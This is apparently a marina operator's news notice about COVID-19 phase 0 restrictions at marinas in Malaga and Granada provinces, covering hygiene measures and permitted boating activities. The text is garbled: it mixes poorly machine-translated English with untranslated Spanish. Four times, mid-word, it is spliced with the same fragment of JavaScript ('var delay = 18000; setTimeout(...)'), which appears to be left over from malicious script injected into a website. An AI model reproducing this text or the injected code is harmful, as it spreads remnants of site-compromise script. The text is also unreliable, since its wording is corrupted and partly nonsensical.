• Being in the provinces of Malaga and Granada, Estepona marinas, The Duchess (Manilva) and East Navy (Almuñécar) stay in the phase 0, aunque trabajandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando para preparar las siguientes fases
The Mediterranean Marine Group, entity that manages the concessions of the marinas of Estepona, The Duchess (Manilva) and East Navy, in Almuñécar, viene realizandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}Ando, since mid-March, hygiene protocols and disinfection of the facilities, specific training for employees and monitoring control of measures, to protect both boaters, as users of commercial premises and employees of marinas. In this way, los puertos se encuentran preparados para cuandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando nuestra zona geográfica pase a la Fase 1 de-escalation plan for confinement arising from the health crisis Coronavirus.
For now, the provinces of Malaga and Granada continue in the 0, so it should be remembered that nautical activity in marinas managed by Marinas del Mediterráneo is limited, as before, To:
1) Sport sailing, rowing or similar, within the municipality and users must reside in the same municipality where their boat is located.
2) Visitas a embarcaciones para comprobación de seguridad y mantenimiento por una persona y respetandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando los protocolos y procedimientos establecidos por el puerto.
Once this phase is over, And, if there are no changes on the part of the competent authorities, would move on to the Phase 1 where some nautical activities can be carried out with greater freedom. Mediterranean Navies will advance this information as soon as the authorities and agencies involved report the move to the 1.
In addition, since the beginning of the state of alarm, workers at marinas have continued to monitor and monitor and provide boat and industrial services on the boats, as well as disinfection and adequacy work in the busiest areas and commercial premises.
From marinas del Mediterráneo it is remembered to follow the recommendations of health professionals and maintain prudence. They also send a message of encouragement to all citizens and wish that they will soon be seen enjoying their passion for the sea, as well as the ports enjoy their presence.